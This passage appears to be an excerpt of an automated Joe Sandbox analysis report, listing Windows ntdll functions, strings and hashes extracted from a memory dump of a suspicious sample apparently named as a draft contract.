                                                                                                                        • Instruction Fuzzy Hash: E561AD71600301DFDB29CF28C884B6AFBE5FF45708F14859DE84A8B29AD770E981CB91
                                                                                                                        Function 0173C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 017782D7
                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 017782DE
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017782E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-1783798831
                                                                                                                        • Opcode ID: cfef05f3b9953b901304d11a3be94fa1a2a4fb2ae9cf406736233788d19547c2
                                                                                                                        • Instruction ID: 4a029f270f28416f950b7d4648d844390306921eb8a395bcb934f2194fae3fe3
                                                                                                                        • Opcode Fuzzy Hash: cfef05f3b9953b901304d11a3be94fa1a2a4fb2ae9cf406736233788d19547c2
                                                                                                                        • Instruction Fuzzy Hash: FB41D471544301ABD722EB68DC49B5BF7E8EF84760F10892EFA45D7299EB70D800CB91
                                                                                                                        Function 017BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017BC1C5
                                                                                                                        • @, xrefs: 017BC1F1
                                                                                                                        • PreferredUILanguages, xrefs: 017BC212
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                        • API String ID: 0-2968386058
                                                                                                                        • Opcode ID: 56fc2401ab1950279fa3b4f78be8354307bc8b8fc55abf37ea3806db522902fc
                                                                                                                        • Instruction ID: d6694379843f0eaec07ac3677361fba0e47dfae4ec7e778a0ddfa10118a2442b
                                                                                                                        • Opcode Fuzzy Hash: 56fc2401ab1950279fa3b4f78be8354307bc8b8fc55abf37ea3806db522902fc
                                                                                                                        • Instruction Fuzzy Hash: AE416371E04219EBEB12DBD8C885FEEFBB8AB18700F14816AE605F7244D7749A45CB50
                                                                                                                        Function 01794144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                        • API String ID: 0-1373925480
                                                                                                                        • Opcode ID: 684aa7216ab72c14927b765d0e15283c6c05f7641d5e43734a24238af3f32d49
                                                                                                                        • Instruction ID: 815eb06b1589056d20fee3e1ae5f6d6279fa793dd7358762c142dbd5a1e932c3
                                                                                                                        • Opcode Fuzzy Hash: 684aa7216ab72c14927b765d0e15283c6c05f7641d5e43734a24238af3f32d49
                                                                                                                        • Instruction Fuzzy Hash: DA411472A442588BEF26DBD8EA48BADFBB5FF55340F140499D902EB785D7348906CB10
                                                                                                                        Function 01784755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01784899
                                                                                                                        • LdrpCheckRedirection, xrefs: 0178488F
                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01784888
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                        • API String ID: 0-3154609507
                                                                                                                        • Opcode ID: 9abc34431b1425d00134a976f800fc15c31ae1f74f17e60b229d6cb8019cfcce
                                                                                                                        • Instruction ID: b64ae8b0617f85a8a203d0cbd0cf0640bd8d5d5250768ffc82317bc3ded3be47
                                                                                                                        • Opcode Fuzzy Hash: 9abc34431b1425d00134a976f800fc15c31ae1f74f17e60b229d6cb8019cfcce
                                                                                                                        • Instruction Fuzzy Hash: D541B232A942529FCB21EE59D840B26FBE5EF49650F06056DED4AD7215E7B0E800CB91
                                                                                                                        Function 01710BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                        • API String ID: 0-2558761708
                                                                                                                        • Opcode ID: b540bd6b597e29bd2446ac9deb9e89ef30575cf554844cc0645c09c018fa9769
                                                                                                                        • Instruction ID: e91c1bea9fd947b2df7754307dc5d85a711ab080b6e47fd401dada14c67e7847
                                                                                                                        • Opcode Fuzzy Hash: b540bd6b597e29bd2446ac9deb9e89ef30575cf554844cc0645c09c018fa9769
                                                                                                                        • Instruction Fuzzy Hash: B911E1313151029FDB29CA1CCC84B7AFBA9FF41659F18819DF806CB259DB34D884C754
                                                                                                                        Function 017820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Process initialization failed with status 0x%08lx, xrefs: 017820F3
                                                                                                                        • LdrpInitializationFailure, xrefs: 017820FA
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01782104
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-2986994758
                                                                                                                        • Opcode ID: 04d0e93fd31dffec120e5a86d2ecf1c33352c77054cef8c812c171b60df950c2
                                                                                                                        • Instruction ID: f62c92c9ed9a966060d1c9cd3c36637baac583ba47cf36d9feef9c9532eb8231
                                                                                                                        • Opcode Fuzzy Hash: 04d0e93fd31dffec120e5a86d2ecf1c33352c77054cef8c812c171b60df950c2
                                                                                                                        • Instruction Fuzzy Hash: 2DF0C875B81308AFE724E64CCC5AF9A77ACEB40B64F21005DF60567685D6B0A544C651
                                                                                                                        Function 017103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: #%u
                                                                                                                        • API String ID: 48624451-232158463
                                                                                                                        • Opcode ID: 272352f45cf33d334917af5d80579bbecefe3f673c4e2ecd17d45a454e1a2c4e
                                                                                                                        • Instruction ID: 7aa0824954ada4e15e293ac44e7a2c44c644ad4e7652f77abea14ae6a549f392
                                                                                                                        • Opcode Fuzzy Hash: 272352f45cf33d334917af5d80579bbecefe3f673c4e2ecd17d45a454e1a2c4e
                                                                                                                        • Instruction Fuzzy Hash: 2C711771A0014A9FDB05DFA8C994FAEBBF8BF18704F144065E905E7259EB34ED45CBA0
                                                                                                                        Function 0170A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • LdrResSearchResource Enter, xrefs: 0170AA13
                                                                                                                        • LdrResSearchResource Exit, xrefs: 0170AA25
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                        • API String ID: 0-4066393604
                                                                                                                        • Opcode ID: cbb3ef65148bb43dd75560cf4cef7d8898783563a68e3aa70f5cedebecef4701
                                                                                                                        • Instruction ID: a725c5ee2c50b1a123f18ebbf317a5082fb39a5938926b987bcf65b11c20104e
                                                                                                                        • Opcode Fuzzy Hash: cbb3ef65148bb43dd75560cf4cef7d8898783563a68e3aa70f5cedebecef4701
                                                                                                                        • Instruction Fuzzy Hash: 68E16A71E00719EBEF22CA98C984BAEFBBABF58314F10446AED01E7291D7749941CB50
                                                                                                                        Function 017CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: `$`
                                                                                                                        • API String ID: 0-197956300
                                                                                                                        • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                        • Instruction ID: 11b5c460e031d5f26a15f5dff5a47e40c652d69c8a6d866940e07a5ce6d374dd
                                                                                                                        • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                        • Instruction Fuzzy Hash: 8BC1CE3120434A9BEB24CF28C844B6BFBE5BFD4B19F184A2CF6969B290E774D505CB41
                                                                                                                        Function 0177E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: Legacy$UEFI
                                                                                                                        • API String ID: 2994545307-634100481
                                                                                                                        • Opcode ID: 06c0b81a96860dd83aed041c2ac057d12882884715bcdd54effa94ee8b266afa
                                                                                                                        • Instruction ID: 31de751846eff3d44de97b38d44f553f9162a53eef0fe5130519982305047020
                                                                                                                        • Opcode Fuzzy Hash: 06c0b81a96860dd83aed041c2ac057d12882884715bcdd54effa94ee8b266afa
                                                                                                                        • Instruction Fuzzy Hash: E6612A71E407199FDB25DFA8C844BAEFBB9FB48704F1440ADE649EB291DB31A940CB50
                                                                                                                        Function 017A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$MUI
                                                                                                                        • API String ID: 0-17815947
                                                                                                                        • Opcode ID: 9abde963ae1670a8d85efa84472f8300b0433504f263874dc53db7f97875892c
                                                                                                                        • Instruction ID: 3a4ae9d2295796f895f508c57bf9eef6482ec7ae98e974641c9ad91d79b5881e
                                                                                                                        • Opcode Fuzzy Hash: 9abde963ae1670a8d85efa84472f8300b0433504f263874dc53db7f97875892c
                                                                                                                        • Instruction Fuzzy Hash: D15138B1E0021DAFDB11DFA9CC84AEEFBB8EB44754F540629E611B7280D7719A45CB60
                                                                                                                        Function 017004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0170063D
                                                                                                                        • kLsE, xrefs: 01700540
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                        • API String ID: 0-2547482624
                                                                                                                        • Opcode ID: 0600fdee785176629d0612dc75cdb14013ac514346981f2d91adc5672c05a126
                                                                                                                        • Instruction ID: e3614d9ece0ad9981aa95c42dd53f3c173ed00d7aa9ae739dbf7a98d14c10d32
                                                                                                                        • Opcode Fuzzy Hash: 0600fdee785176629d0612dc75cdb14013ac514346981f2d91adc5672c05a126
                                                                                                                        • Instruction Fuzzy Hash: ED51BE71504742CFD726DF28C844BA7FBE5AF84360F20883EFA9A87281E7709545CB92
                                                                                                                        Function 0170A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 0170A309
                                                                                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 0170A2FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                        • API String ID: 0-2876891731
                                                                                                                        • Opcode ID: 4cafa55950cf664699fb81513c1f47f5c3031dd53cf6fcc8cbd7a7d40a50e80a
                                                                                                                        • Instruction ID: f6b871142cc421954b8c0261b67b743496f696a7d75dd786cf3f38b8f68f646f
                                                                                                                        • Opcode Fuzzy Hash: 4cafa55950cf664699fb81513c1f47f5c3031dd53cf6fcc8cbd7a7d40a50e80a
                                                                                                                        • Instruction Fuzzy Hash: 7841AC30A04745DBDB16CF59C844BAAFBF8FF95700F2480A5E904DB2A6E6B5D940CB50
                                                                                                                        Function 0173A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                                        • Opcode ID: f1cb17946a192ab7f549557e47ee1e7b8d0d4cfe8b9d7ecc4ebc8f873c1cb6a6
                                                                                                                        • Instruction ID: 03e6caa0b9c1c6f380c2494387971319d81b1f4f1b5f9c5c825f8bfffb7e87df
                                                                                                                        • Opcode Fuzzy Hash: f1cb17946a192ab7f549557e47ee1e7b8d0d4cfe8b9d7ecc4ebc8f873c1cb6a6
                                                                                                                        • Instruction Fuzzy Hash: 7E01DCB2644740EFD321DF24CD4AB26B7F8E784B26F018939B689CB595E334E804DB46
                                                                                                                        Function 0170C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: MUI
                                                                                                                        • API String ID: 0-1339004836
                                                                                                                        • Opcode ID: 5f26933904d6b59a9137a01e2f5a4ab34202a5bf0fd72172f6532ea0b0cc3c0e
                                                                                                                        • Instruction ID: 357300c6cce7afb9c784b912e8ffe173b666eecf0205a9f60222a2903f527832
                                                                                                                        • Opcode Fuzzy Hash: 5f26933904d6b59a9137a01e2f5a4ab34202a5bf0fd72172f6532ea0b0cc3c0e
                                                                                                                        • Instruction Fuzzy Hash: AD823C75E00319DBEB26CFA9C8847EDFBF5BF48310F1481A9E919AB295D7309981CB50
                                                                                                                        Function 01786420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 2aa90f08ee112f414010cc6a6e91f583abb6af02401f20c8b1919fae26c28830
                                                                                                                        • Instruction ID: b2a36f1680e474cb6d85d0759a6238ec090a15224fba36d31260b7ff19784ada
                                                                                                                        • Opcode Fuzzy Hash: 2aa90f08ee112f414010cc6a6e91f583abb6af02401f20c8b1919fae26c28830
                                                                                                                        • Instruction Fuzzy Hash: 5C914171A40219BFEB21EF99CD85FAEFBB8EF18B50F104055F600AB195D775A904CBA0
                                                                                                                        Function 017AE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: 9fb8347cd16940d13a4cde7449abbf0d025d434af626bc84b0efe95f1a4878b0
                                                                                                                        • Instruction ID: 436b73ebc9bc6e23507afb1cd3c15267784035328e0d34d30d8aab878e14a42e
                                                                                                                        • Opcode Fuzzy Hash: 9fb8347cd16940d13a4cde7449abbf0d025d434af626bc84b0efe95f1a4878b0
                                                                                                                        • Instruction Fuzzy Hash: FB91AD32900609BFDB22AFA9DC48FAFFBB9EF85750F500129F501A7254EB359905CB91
                                                                                                                        Function 0173A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: GlobalTags
                                                                                                                        • API String ID: 0-1106856819
                                                                                                                        • Opcode ID: a3c6a454dbc8662e73412d314a7d86625475f614b4d6e18eb362117691acc3e5
                                                                                                                        • Instruction ID: 88c4ddffea4d6157874645c623ae41bd021f4b1f422bb9656c31553ce39e29d8
                                                                                                                        • Opcode Fuzzy Hash: a3c6a454dbc8662e73412d314a7d86625475f614b4d6e18eb362117691acc3e5
                                                                                                                        • Instruction Fuzzy Hash: 8B716DB5E0061ACFEF28CF9DC590AADFBB1BF88750F14816EE505A7249E7319841CB90
                                                                                                                        Function 017A4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .mui
                                                                                                                        • API String ID: 0-1199573805
                                                                                                                        • Opcode ID: 00755e6553fb6f0403e5804d58a46e69ff3d229d51a29718c6cda87e234dff36
                                                                                                                        • Instruction ID: adadf60e08d9e34a31081271bc7182a99fa4f5f6f83e2ed187a0253ea5cddf89
                                                                                                                        • Opcode Fuzzy Hash: 00755e6553fb6f0403e5804d58a46e69ff3d229d51a29718c6cda87e234dff36
                                                                                                                        • Instruction Fuzzy Hash: 9951C572D0022ADBDF11DF9DC844AAEFBB4BF84610F494269E912BB244D7B59D01CBE4
                                                                                                                        Function 0171E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: EXT-
                                                                                                                        • API String ID: 0-1948896318
                                                                                                                        • Opcode ID: aa86b39777855211bafbbdd6eb579afb4f75ade774b6b8d8bb573cdc226ff3a7
                                                                                                                        • Instruction ID: b12686ce4036f81cf50304bc932bd91e224494cd143558cd0825c4808603cb28
                                                                                                                        • Opcode Fuzzy Hash: aa86b39777855211bafbbdd6eb579afb4f75ade774b6b8d8bb573cdc226ff3a7
                                                                                                                        • Instruction Fuzzy Hash: B34193725083129BE712DB79C844B6BFBE8AF88714F44092DFA85E7188EB74D904C796
                                                                                                                        Function 0177C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: BinaryHash
                                                                                                                        • API String ID: 0-2202222882
                                                                                                                        • Opcode ID: 0768dc585b8f19496c8cdbcd4c842efcbef61cbe29853d5cc3516d814f9a66e3
                                                                                                                        • Instruction ID: c448ec2ca7a129b45ca8c8f7ea194b66acc34df30e171d8dd1f226e3e20176b9
                                                                                                                        • Opcode Fuzzy Hash: 0768dc585b8f19496c8cdbcd4c842efcbef61cbe29853d5cc3516d814f9a66e3
                                                                                                                        • Instruction Fuzzy Hash: 864142B1D4052EABDF21DA50DC84FDEF77CAB49724F0045A5AB08AB144DB709E898FA4
                                                                                                                        Function 01796B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: #
                                                                                                                        • API String ID: 0-1885708031
                                                                                                                        • Opcode ID: 7f36ca8a8f75e3c2490e90a80ec03199db61eebcd46880b097d4d398be8ac9de
                                                                                                                        • Instruction ID: 73d367a04ac1e47cd2e965ccadb55e512b885502e95a398455d73daae25f39ff
                                                                                                                        • Opcode Fuzzy Hash: 7f36ca8a8f75e3c2490e90a80ec03199db61eebcd46880b097d4d398be8ac9de
                                                                                                                        • Instruction Fuzzy Hash: 94311631A007999BEF22DF69D854BAEFBA8DF06704F144168F941AB282D775F809CB50
                                                                                                                        Function 0177CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: BinaryName
                                                                                                                        • API String ID: 0-215506332
                                                                                                                        • Opcode ID: b2c3e29a7ac6f39ac373cdb4f84dea1240ead5041674bdea7eb411b8419063f8
                                                                                                                        • Instruction ID: 0291026dce13fbefff005131dbfca850d1c866a3117b16c8520739db5bac2195
                                                                                                                        • Opcode Fuzzy Hash: b2c3e29a7ac6f39ac373cdb4f84dea1240ead5041674bdea7eb411b8419063f8
                                                                                                                        • Instruction Fuzzy Hash: E7310336900516AFEF16DB58C845E7FFB74EB88720F114169B901AB260D7309E04EBE0
                                                                                                                        Function 0178892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0178895E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                        • API String ID: 0-702105204
                                                                                                                        • Opcode ID: 171caa5f60afc57610ef6b85baf29a8ad9118bbd02c26c90582b54d6060dbffd
                                                                                                                        • Instruction ID: 9c5b679add9202dcc16ee14aea5ae02d5a0aef5e7e1c94afd6768d3987ae1630
                                                                                                                        • Opcode Fuzzy Hash: 171caa5f60afc57610ef6b85baf29a8ad9118bbd02c26c90582b54d6060dbffd
                                                                                                                        • Instruction Fuzzy Hash: 110126762883019BE7317B5ACC88B6BFFA9EF81364B44012CF7811A156CF20A840C797
                                                                                                                        Function 017A2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 459c99dbf5b7950bdc0dd0aad2683d8ff5f42e8423abc94defde5cb5186f0bcd
                                                                                                                        • Instruction ID: 46ccd3a6ee58a4fd1a1d2089a0e8fbf7685ea14497d1e49b69c0bc4ad0398363
